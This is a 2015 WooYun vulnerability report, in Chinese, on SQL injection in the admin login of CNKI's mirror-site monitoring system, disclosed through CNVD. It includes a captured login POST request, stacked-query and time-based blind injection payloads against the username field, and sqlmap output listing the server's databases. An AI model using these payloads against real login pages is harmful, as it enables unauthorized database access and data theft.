漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0151913
漏洞标题:中国知网CNKI镜像站点运行状况实时监控系统存在SQL注入
相关厂商:中国知网
漏洞作者: 西西
提交时间:2015-11-05 00:16
修复时间:2015-12-24 11:18
公开时间:2015-12-24 11:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开
简要描述:
中国知网CNKI镜像站点运行状况实时监控系统存在SQL注入
详细说明:
中国知网CNKI镜像站点运行状况实时监控系统存在SQL注入
漏洞证明:
问题出在登陆处
登录地址
http://**.**.**.**/liveupdateservice/admin/index.html
用户名尝试输入 admin'
密码123456 报错
![BPOC8EQ$}60~EGZ94]WGN[L.png](http://wimg.zone.ci/upload/201511/04232137daab10333c700ccdc92def1f55550bf1.png)
登录抓包
包文如下
POST /liveupdateservice/admin/login.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://**.**.**.**/liveupdateservice/admin/login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 229
Pragma: no-cache
Cookie: c_m_LinID=LinID=WEEvREcwSlJHSldTTGJhYlNxQWg4QW1Ga3FKcHhack5rK1BlR2REc0trSk8yQXFvVk8wQ0lTR3EwNmI3VzljdVhjRT0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&ot=11/04/2015 23:09:04
__VIEWSTATE=%2FwEPDwUKLTQ0NzYwOTk0M2Rkc738vaXQQCBl9Q9Y6RnPSi0OZ%2Bg%3D&__EVENTVALIDATION=%2FwEWBAKrhJr8BQKDqZedAwKT%2FZj2BAKC3IeGDB%2FIm%2FAdkBDRUCSDan8pHtXugA2M&txbUsername=admin&txbPassword=123456&btnLogin=%E7%99%BB%E5%BD%95
尝试注入 发现txbUsername参数存在stacked queries型注入
注入结果
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txbUsername
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTQ0NzYwOTk0M2Rkc738vaXQQCBl9Q9Y6RnPSi0OZ+g%3D&
__EVENTVALIDATION=/wEWBAKrhJr8BQKDqZedAwKT/Zj2BAKC3IeGDB/Im/AdkBDRUCSDan8pHtXugA
2M&txbUsername=admin'; WAITFOR DELAY '0:0:5'--&txbPassword=123456&btnLogin=%E7%9
9%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTQ0NzYwOTk0M2Rkc738vaXQQCBl9Q9Y6RnPSi0OZ+g%3D&
__EVENTVALIDATION=/wEWBAKrhJr8BQKDqZedAwKT/Zj2BAKC3IeGDB/Im/AdkBDRUCSDan8pHtXugA
2M&txbUsername=admin' WAITFOR DELAY '0:0:5'--&txbPassword=123456&btnLogin=%E7%99
%BB%E5%BD%95
---
[23:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[23:01:39] [INFO] fetching database names
[23:01:39] [INFO] fetching number of databases
[23:01:40] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[23:01:47] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[23:01:57] [INFO] adjusting time delay to 1 second due to good response times
6
[23:01:57] [INFO] retrieved: KNet.LiveAnalyse
[23:03:08] [ERROR] invalid character detected. retrying..
[23:03:08] [WARNING] increasing time delay to 2 seconds
.DB
[23:03:29] [INFO] retrieved: KNet.LiveUpdate.DBA
[23:05:53] [INFO] retrieved: maste
[23:06:41] [ERROR] invalid character detected. retrying..
[23:06:41] [WARNING] increasing time delay to 3 seconds
r
[23:06:55] [INFO] retrieved: model
[23:08:01] [INFO] retrieved: msd
[23:08:49] [ERROR] invalid character detected. retrying..
[23:08:49] [WARNING] increasing time delay to 4 seconds
b
[23:09:02] [INFO] retrieved: tempdb
available databases [6]:
[*] [KNet.LiveAnalyse.DB\x05]
[*] [KNet.LiveUpdate.DBA]
[*] [master\x05]
[*] [tempdb\x02\x11]
[*] model
[*] msdb
6个库
------The End------
修复方案:
不会啊
版权声明:转载请注明来源 西西@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-11-09 11:16
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。
最新状态:
暂无